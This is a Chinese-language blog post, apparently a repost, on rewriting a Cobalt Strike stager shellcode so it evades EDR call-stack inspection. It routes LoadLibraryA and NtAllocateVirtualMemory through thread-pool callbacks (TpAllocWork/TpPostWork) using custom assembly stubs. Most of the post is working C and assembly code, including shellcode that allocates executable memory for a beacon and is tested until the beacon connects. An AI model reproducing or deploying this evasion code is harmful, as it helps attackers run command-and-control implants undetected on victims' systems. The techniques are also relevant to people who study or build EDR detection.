原文链接:利用自定义堆栈进行 Shellcode 开发
1. 概述最近学习了下 BRC4 作者1月发表的博客 Hiding In PlainSight - Indirect Syscall is Dead! Long Live Custom Call Stacks (以下称原文章),原文章讲述了利用回调函数和通过少量汇编代码修改堆栈来绕过 EDR 的一些技巧,刚好前几天尝试重写了 CS 的 shellcode,今天打算用这篇文章里提到的一些技术来改造下之前写的 shellcode,算是之前 CS 4.7 Stager 逆向及 Shellcode 重写 - 先知社区 的一个续篇。 2. EDR 的检测点一些 EDR 通过用户态 hook 或 ETW 对敏感 API 的调用进行堆栈追踪,通过回溯堆栈中的返回地址以捕获 Shellcode: - |-----------Top Of The Stack-----------|
- | |
- | |
- |--------------------------------------|
- |------Stack Frame of LoadLibrary------|
- | Return address of RX on disk |
- | |
- |----------Stack Frame of RX-----------| <- Detection (An unbacked RX region should never call LoadLibraryA)
- | Return address of PE on disk |
- | |
- |-----------Stack Frame of PE----------|
- | Return address of RtlUserThreadStart |
- | |
- |---------Bottom Of The Stack----------|
复制代码
3. 使用回调函数回调函数就是一个通过函数指针调用的函数。如果你把函数的指针(地址)作为参数传递给另一个函数,当这个指针被用来调用其所指向的函数时,我们就说这是回调函数。回调函数不是由该函数的实现方直接调用,而是在特定的事件或条件发生时由另外的一方调用的,用于对该事件或条件进行响应。 作者在原文章中以 TpAllocWork 函数为例,该函数的结构如下: - NTSTATUS NTAPI TpAllocWork(
- PTP_WORK* ptpWrk,
- PTP_WORK_CALLBACK pfnwkCallback,
- PVOID OptionalArg,
- PTP_CALLBACK_ENVIRON CallbackEnvironment
- );
复制代码
其中的第二个参数即是一个函数指针,假如我们将该参数替换成指向 LoadLibraryA 函数的指针,那么函数 LoadLibraryA 就会作为一个回调函数传递给 TpAllocWork,而后通过调用 TpPostWork 来创建一个新的线程执行 TpAllocWork 中的保存的回调函数,此时,LoadLibraryA 函数的返回地址会指向 TpPostWork 函数。理想的函数返回情况如下: - LoadLibraryA -> TpPostWork -> RtlUserThreadStart
复制代码第三个参数是回调函数的参数,在原文章中是 wininet.dll,我们需要将 wininet.dll 作为参数传递给我们的 LoadLibraryA 函数。但是,TpAllocWork 函数的第二个参数类型 PTP_WORK_CALLBACK 具有如下结构:
- VOID CALLBACK WorkCallback(
- PTP_CALLBACK_INSTANCE Instance,
- PVOID Context,
- PTP_WORK Work
- );
复制代码这会导致参数无法正确地传递给 LoadLibraryA,如下,wininet.dll 被赋值给了 RDX 寄存器,在x64架构中,RDX 被用作函数传参时的第二个参数,然而,LoadLibraryA 函数并没有第二个参数!
3.1 替换 LoadLibraryA在上一节中我们提到,使用 TpAllocWork 函数无法正确地将参数 wininet.dll 传递给 LoadLibraryA 函数,原作者在此处使用的技巧是通过汇编代码将保存在 RDX 寄存器中的参数传递给 RCX 寄存器,之后通过调用 getLoadLibraryA 函数取得 LoadLibraryA 函数的地址保存在 RAX 寄存器中并跳转执行: - section .text
- extern getLoadLibraryA
- global WorkCallback
- WorkCallback:
- mov rcx, rdx
- xor rdx, rdx
- call getLoadLibraryA
- jmp rax
复制代码因为 RCX 寄存器在x64架构中被用来作为函数的第一个参数来传递,而调用函数 getLoadLibraryA 的返回值将保存在 RAX 寄存器中,此时,RAX 寄存器中保存的即是 LoadLibraryA 函数的地址,通过 jmp 跳转执行,即可正确地将参数 wininet.dll 传递给 LoadLibraryA 函数,getLoadLibraryA 函数如下:
- UINT_PTR getLoadLibraryA() {
- return (UINT_PTR)pLoadLibraryA;
- }
复制代码修改后的堆栈调用:
作者给出的示例代码如下:
- #include <windows.h>
- #include <stdio.h>
- typedef NTSTATUS (NTAPI* TPALLOCWORK)(PTP_WORK* ptpWrk, PTP_WORK_CALLBACK pfnwkCallback, PVOID OptionalArg, PTP_CALLBACK_ENVIRON CallbackEnvironment);
- typedef VOID (NTAPI* TPPOSTWORK)(PTP_WORK);
- typedef VOID (NTAPI* TPRELEASEWORK)(PTP_WORK);
- FARPROC pLoadLibraryA;
- UINT_PTR getLoadLibraryA() {
- return (UINT_PTR)pLoadLibraryA;
- }
- extern VOID CALLBACK WorkCallback(PTP_CALLBACK_INSTANCE Instance, PVOID Context, PTP_WORK Work);
- int main() {
- pLoadLibraryA = GetProcAddress(GetModuleHandleA("kernel32"), "LoadLibraryA");
- FARPROC pTpAllocWork = GetProcAddress(GetModuleHandleA("ntdll"), "TpAllocWork");
- FARPROC pTpPostWork = GetProcAddress(GetModuleHandleA("ntdll"), "TpPostWork");
- FARPROC pTpReleaseWork = GetProcAddress(GetModuleHandleA("ntdll"), "TpReleaseWork");
- CHAR *libName = "wininet.dll";
- PTP_WORK WorkReturn = NULL;
- ((TPALLOCWORK)pTpAllocWork)(&WorkReturn, (PTP_WORK_CALLBACK)WorkCallback, libName, NULL);
- ((TPPOSTWORK)pTpPostWork)(WorkReturn);
- ((TPRELEASEWORK)pTpReleaseWork)(WorkReturn);
- WaitForSingleObject((HANDLE)-1, 0x1000);
- printf("hWininet: %p\n", GetModuleHandleA(libName));
- return 0;
- }
复制代码此处作者定义了一个全局变量 pLoadLibraryA 用于调用函数 getLoadLibraryA 时取得 LoadLibraryA 的函数地址,但是因为我们要写的是一段 shellcode,不能使用全局变量,所以我对此处的 getLoadLibraryA 函数进行了适当的修改,将 pLoadLibrary定义为局部变量并通过函数 GetProcAddressWithHash 获取其地址:
- EXTERN_C UINT_PTR getLoadLibraryA() {
- FARPROC pLoadLibraryA = (FN_LoadLibraryA)GetProcAddressWithHash(0x0726774C);
- return (UINT_PTR)pLoadLibraryA;
- }
复制代码而这又引入了新的问题,在调用 GetProcAddressWithHash 函数后,用于传递参数的几个寄存器的值均发生了变化,这会再次导致参数 wininet.dll 无法正确地传递给 LoadLibraryA 函数,我在此处采用的方法是将 xmm 寄存器作为临时传递参数的寄存器,修改后的汇编代码如下:
- myLoadLibrary PROC
- movq xmm3, rdx
- xor rdx, rdx
- call getLoadLibraryA
- movq rcx, xmm3
- xorps xmm3, xmm3
- jmp rax
- myLoadLibrary ENDP
复制代码
3.2 替换 VirtualAlloc除了对动态链接库的加载进行监测外,一些敏感 API 函数也受到 EDR 的监视,原文章以 NtAllocateVirtualMemory 为例。 首先创建一个结构体用来保存 NtAllocateVirtualMemory 和它的参数: - typedef struct _NTALLOCATEVIRTUALMEMORY_ARGS {
- UINT_PTR pNtAllocateVirtualMemory; // pointer to NtAllocateVirtualMemory - rax
- HANDLE hProcess; // HANDLE ProcessHandle - rcx
- PVOID* address; // PVOID *BaseAddress - rdx; ULONG_PTR ZeroBits - 0 - r8
- PSIZE_T size; // PSIZE_T RegionSize - r9; ULONG AllocationType - MEM_RESERVE|MEM_COMMIT = 3000 - stack pointer
- ULONG permissions; // ULONG Protect - PAGE_EXECUTE_READ - 0x20 - stack pointer
- } NTALLOCATEVIRTUALMEMORY_ARGS, *PNTALLOCATEVIRTUALMEMORY_ARGS;
复制代码之后,我们初始化这个结构体,将它作为指针传递给 TpAllocWork 函数调用我们的回调函数:
- #include <windows.h>
- #include <stdio.h>
- typedef NTSTATUS (NTAPI* TPALLOCWORK)(PTP_WORK* ptpWrk, PTP_WORK_CALLBACK pfnwkCallback, PVOID OptionalArg, PTP_CALLBACK_ENVIRON CallbackEnvironment);
- typedef VOID (NTAPI* TPPOSTWORK)(PTP_WORK);
- typedef VOID (NTAPI* TPRELEASEWORK)(PTP_WORK);
- typedef struct _NTALLOCATEVIRTUALMEMORY_ARGS {
- UINT_PTR pNtAllocateVirtualMemory; // pointer to NtAllocateVirtualMemory - rax
- HANDLE hProcess; // HANDLE ProcessHandle - rcx
- PVOID* address; // PVOID *BaseAddress - rdx; ULONG_PTR ZeroBits - 0 - r8
- PSIZE_T size; // PSIZE_T RegionSize - r9; ULONG AllocationType - MEM_RESERVE|MEM_COMMIT = 3000 - stack pointer
- ULONG permissions; // ULONG Protect - PAGE_EXECUTE_READ - 0x20 - stack pointer
- } NTALLOCATEVIRTUALMEMORY_ARGS, *PNTALLOCATEVIRTUALMEMORY_ARGS;
- extern VOID CALLBACK WorkCallback(PTP_CALLBACK_INSTANCE Instance, PVOID Context, PTP_WORK Work);
- int main() {
- LPVOID allocatedAddress = NULL;
- SIZE_T allocatedsize = 0x1000;
- NTALLOCATEVIRTUALMEMORY_ARGS ntAllocateVirtualMemoryArgs = { 0 };
- ntAllocateVirtualMemoryArgs.pNtAllocateVirtualMemory = (UINT_PTR) GetProcAddress(GetModuleHandleA("ntdll"), "NtAllocateVirtualMemory");
- ntAllocateVirtualMemoryArgs.hProcess = (HANDLE)-1;
- ntAllocateVirtualMemoryArgs.address = &allocatedAddress;
- ntAllocateVirtualMemoryArgs.size = &allocatedsize;
- ntAllocateVirtualMemoryArgs.permissions = PAGE_EXECUTE_READ;
- FARPROC pTpAllocWork = GetProcAddress(GetModuleHandleA("ntdll"), "TpAllocWork");
- FARPROC pTpPostWork = GetProcAddress(GetModuleHandleA("ntdll"), "TpPostWork");
- FARPROC pTpReleaseWork = GetProcAddress(GetModuleHandleA("ntdll"), "TpReleaseWork");
- PTP_WORK WorkReturn = NULL;
- ((TPALLOCWORK)pTpAllocWork)(&WorkReturn, (PTP_WORK_CALLBACK)WorkCallback, &ntAllocateVirtualMemoryArgs, NULL);
- ((TPPOSTWORK)pTpPostWork)(WorkReturn);
- ((TPRELEASEWORK)pTpReleaseWork)(WorkReturn);
- WaitForSingleObject((HANDLE)-1, 0x1000);
- printf("allocatedAddress: %p\n", allocatedAddress);
- getchar();
- return 0;
- }
复制代码在之前处理 LoadLibraryA 函数时,为了能够构造 PTP_WORK_CALLBACK 类型的函数结构并将正确的参数传递给 LoadLibraryA 函数,我们编写了一些汇编代码将 RDX 寄存器中的存储的参数转移到了 RCX 寄存器中,而此处的 NtAllocateVirtualMemory 函数有6个参数,这些参数在传递时不仅使用了寄存器,还需要使用堆栈进行传参。我们的 WorkCallback 本质上是通过另一个函数 TppWorkpExecuteCallback 进行调用的,此时的堆栈顶部会保存该函数的返回地址:
如果我们此时修改堆栈顶部的内容,将 NtAllocateVirtualMemory 函数的参数分配新的空间到栈中,会破坏这个堆栈结构,从而导致 WorkCallback 函数无法正常返回,所以我们不能改变现有的堆栈结构,同时又将 NtAllocateVirtualMemory 参数的值保存到这个堆栈结构中,恰好当前 TppWorkpExecuteCallback 函数的堆栈结构有足够的空间容纳 NtAllocateVirtualMemory 函数的参数,作者给出的汇编代码:
- section .text
- global WorkCallback
- WorkCallback:
- mov rbx, rdx ; backing up the struct as we are going to stomp rdx
- mov rax, [rbx] ; NtAllocateVirtualMemory
- mov rcx, [rbx + 0x8] ; HANDLE ProcessHandle
- mov rdx, [rbx + 0x10] ; PVOID *BaseAddress
- xor r8, r8 ; ULONG_PTR ZeroBits
- mov r9, [rbx + 0x18] ; PSIZE_T RegionSize
- mov r10, [rbx + 0x20] ; ULONG Protect
- mov [rsp+0x30], r10 ; stack pointer for 6th arg
- mov r10, 0x3000 ; ULONG AllocationType
- mov [rsp+0x28], r10 ; stack pointer for 5th arg
- jmp rax
复制代码调用 NtAllocateVirtualMemory 时寄存器和堆栈情况:
此时 NtAllocateVirtualMemory 在堆栈调用关系上与我们的 shellcode 区域没有明显的关联:
构建 ShellcodeShellcode 的编写方法我在 CS 4.7 Stager 逆向及 Shellcode 重写 - 先知社区 已经做了介绍,这里不再赘述。 替换 LoadLibraryA 进行模块加载: - /* Load User32.dll */
- ai.pfnTpAllocWork(&LoadUser32, (PTP_WORK_CALLBACK)myLoadLibrary, (PVOID)szUser32, NULL);
- ai.pfnTpPostWork(LoadUser32);
- ai.pfnTpReleaseWork(LoadUser32);
- /* Load Wininet.dll */
- ai.pfnTpAllocWork(&LoadWininet, (PTP_WORK_CALLBACK)myLoadLibrary, (PVOID)szWininet, NULL);
- ai.pfnTpPostWork(LoadWininet);
- ai.pfnTpReleaseWork(LoadWininet);
复制代码替换 VirtualAlloc 分配内存空间:
- /* Allocate Memory For URL */
- ntAllocateVirtualMemoryUrlArgs.pNtAllocateVirtualMemory = (UINT_PTR)GetProcAddressWithHash(0x9488B12D);
- ntAllocateVirtualMemoryUrlArgs.hProcess = (HANDLE)-1;
- ntAllocateVirtualMemoryUrlArgs.address = &httpurl;
- ntAllocateVirtualMemoryUrlArgs.size = &allocatedurlsize;
- ntAllocateVirtualMemoryUrlArgs.permissions = PAGE_READWRITE;
- ai.pfnTpAllocWork(&AllocUrl, (PTP_WORK_CALLBACK)myNtAllocateVirtualMemory, &ntAllocateVirtualMemoryUrlArgs, NULL);
- ai.pfnTpPostWork(AllocUrl);
- ai.pfnTpReleaseWork(AllocUrl);
- /* Allocate Memory For Beacon */
- ntAllocateVirtualMemoryBeaconArgs.pNtAllocateVirtualMemory = (UINT_PTR)GetProcAddressWithHash(0x9488B12D);
- ntAllocateVirtualMemoryBeaconArgs.hProcess = (HANDLE)-1;
- ntAllocateVirtualMemoryBeaconArgs.address = &beacon;
- ntAllocateVirtualMemoryBeaconArgs.size = &allocatedbeaconsize;
- ntAllocateVirtualMemoryBeaconArgs.permissions = PAGE_EXECUTE_READWRITE;
- ai.pfnTpAllocWork(&AllocBeacon, (PTP_WORK_CALLBACK)myNtAllocateVirtualMemory, &ntAllocateVirtualMemoryBeaconArgs, NULL);
- ai.pfnTpPostWork(AllocBeacon);
- ai.pfnTpReleaseWork(AllocBeacon);
复制代码回调函数的汇编代码:
- EXTRN getLoadLibraryA: PROC
- PUBLIC myLoadLibrary
- PUBLIC myNtAllocateVirtualMemory
- _TEXT SEGMENT
- myLoadLibrary PROC
- movq xmm3, rdx
- xor rdx, rdx
- call getLoadLibraryA
- movq rcx, xmm3
- xorps xmm3, xmm3
- jmp rax
- myLoadLibrary ENDP
- myNtAllocateVirtualMemory PROC
- mov rbx, rdx ; backing up the struct as we are going to stomp rdx
- mov rax, [rbx] ; NtAllocateVirtualMemory
- mov rcx, [rbx + 8h] ; HANDLE ProcessHandle
- mov rdx, [rbx + 10h] ; PVOID *BaseAddress
- xor r8, r8 ; ULONG_PTR ZeroBits
- mov r9, [rbx + 18h] ; PSIZE_T RegionSize
- mov r10, [rbx + 20h] ; ULONG Protect
- mov [rsp+30h], r10 ; stack pointer for 6th arg
- mov r10, 3000h ; ULONG AllocationType
- mov [rsp+28h], r10 ; stack pointer for 5th arg
- jmp rax
- myNtAllocateVirtualMemory ENDP
- _TEXT ENDS
- END
复制代码将汇编部分编译成 obj 文件,然后在项目属性链接器部分将其作为附加依赖项:
需要注意的是,项目属性要禁用优化或者改为优化速度,否则编译的 shellcode 无法正常运行(这里我也不清楚原因,有知道的师傅还请指教下),这也导致提取出来的 shellcode 比之前的大了一倍多:
提取 shellcode,使用一个简单的加载器测试上线:
|